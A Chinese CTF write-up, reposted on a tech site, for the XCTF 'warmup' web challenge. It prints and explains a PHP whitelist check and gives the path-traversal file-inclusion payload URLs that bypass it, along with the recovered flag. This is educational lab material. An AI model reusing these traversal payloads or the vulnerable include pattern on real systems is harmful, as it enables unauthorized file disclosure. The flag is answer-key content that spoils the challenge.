IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓ 		图片批量下载器
↓批量下载图片,美女图库↓ 		图片自动播放器
↓图片自动播放器↓ 		一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> XCTF-攻防世界CTF平台-Web类——6、warmup -> 正文阅读

[PHP知识库]XCTF-攻防世界CTF平台-Web类——6、warmup

题目提示:you can’t see it? well,I guess i can.
打开题目地址:
在这里插入图片描述

标题栏是Document,只有一张图片,所以我们审计源代码:
在这里插入图片描述

有一个source.php打开:
在这里插入图片描述

有一段判断页面的代码,还有一个hint.php
在这里插入图片描述

提示flag在ffffllllaaaagggg中,应该是另一个文件中,直接访问ffffllllaaaagggg文件是不存在的:
在这里插入图片描述

所以我们继续看source.php中的代码:

<?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?>

介绍一下主要用到的函数和变量:
$_REQUEST :
用于收集HTML表单提交的数据,默认情况下包含$_GET、$_POST和$_COOKIE内容的关联数组,这是一个“超全局”或自动全局变量。这只是意味着它在整个脚本的所有范围内都可用。不需要做全局$variable;在函数或方法中访问它。

程序的主要逻辑是if (! empty($_REQUEST['file'])&& is_string($_REQUEST['file'])&&emmm::checkFile($_REQUEST['file'])这个判断中的三个条件,成立就会include $_REQUEST[‘file’]包含输入的文件代码,否则就输出那张滑稽图片。
第一个条件:检查一个变量是否为空,第二个条件:是否为字符串,其中主要是第三个条件checkFile函数的判断:

public static function checkFile(&$page){
//关联数组键值对
    $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
//第一种情况:$page变量传入的是source.php或hint.php页面
//$page变量是否被设置,是否是一个字符串
    if (! isset($page) || !is_string($page)) {
        echo "you can't see it";
        return false;
    }
		 //$page变量的值是否在$whitelist数组中:source.php或hint.php
    if (in_array($page, $whitelist)) {return true;}
//第二种情况:source.php或hint.php后面带?的参数
//mb_strpos:查找?在$page中首次出现的位置,mb_substr:截取?之前的字符串
    $_page = mb_substr($page,0,mb_strpos($page . '?', '?'));
//?之前的页面是否在$whitelist数组中
    if (in_array($_page, $whitelist)) {
       return true;
    }
//第三种情况:source.php或hint.php后面带?经过url编码的参数
//urldecode:解码URL字符串,
    $_page = urldecode($page);
//再截取?之前的字符串
    $_page = mb_substr($_page,0,mb_strpos($_page . '?', '?'));
//再判断?之前的页面是否在$whitelist数组中    
if (in_array($_page, $whitelist)) {return true;}
    echo "you can't see it";
    return false;
}

所以允许的payload就是:

http://111.200.241.244:56778/?file=source.php?+payload

或者

http://111.200.241.244:56778/source.php?file=hint.php?+payload

条件成立之后include $_REQUEST[‘file’]就会包含输入的文件代码,这里我们的payload还需要用到include函数的一个特性:
被包含文件先按参数给出的路径寻找,如果没有给出目录(只有文件名)时则按照include_path指定的目录寻找。如果在include_path下没找到该文件则include最后才在调用脚本文件所在的目录和当前工作目录下寻找。如果最后仍未找到文件则include结构会发出一条E_WARNING。
如果定义了路径——不管是绝对路径(在 Windows 下以盘符或者 \ 开头,在 Unix/Linux 下以 / 开头)还是当前目录的相对路径(以 . 或者 … 开头)——include_path 都会被完全忽略。例如一个文件以 …/ 开头,则解析器会在当前目录的父目录下寻找该文件。
在这里插入图片描述

所以我们可以通过include函数的这个特性,一层一层文件夹的去寻找ffffllllaaaagggg文件:
http://111.200.241.244:56778/source.php?file=hint.php?/…/ffffllllaaaagggg
在这里插入图片描述

http://111.200.241.244:56778/source.php?file=hint.php?/…/…/ffffllllaaaagggg
在这里插入图片描述

http://111.200.241.244:56778/source.php?file=hint.php?/…/…/…/ffffllllaaaagggg
在这里插入图片描述

http://111.200.241.244:56778/source.php?file=hint.php?/…/…/…/…/ffffllllaaaagggg
在这里插入图片描述

最终的flag就是在第四层:flag{25e7bce6005c4e0c983fb97297ac6e5a}
同样地,另一个payload也可以:
http://111.200.241.244:56778/source.php?file=source.php?/…/…/…/…/ffffllllaaaagggg

另外,首页也可以进行文件包含攻击:

http://111.200.241.244:56778/?file=hint.php?/../../../../ffffllllaaaagggg

在这里插入图片描述

http://111.200.241.244:56778/?file=source.php?/../../../../ffffllllaaaagggg

在这里插入图片描述

得到flag{25e7bce6005c4e0c983fb97297ac6e5a}
  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章           查看所有文章
加:2021-11-19 17:26:35  更:2021-11-19 17:26:55 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/14 14:30:56-

图片自动播放器
↓图片自动播放器↓ 		TxT小说阅读器
↓语音阅读,小说下载,古典文学↓ 		一键清除垃圾
↓轻轻一点,清除系统垃圾↓ 		图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码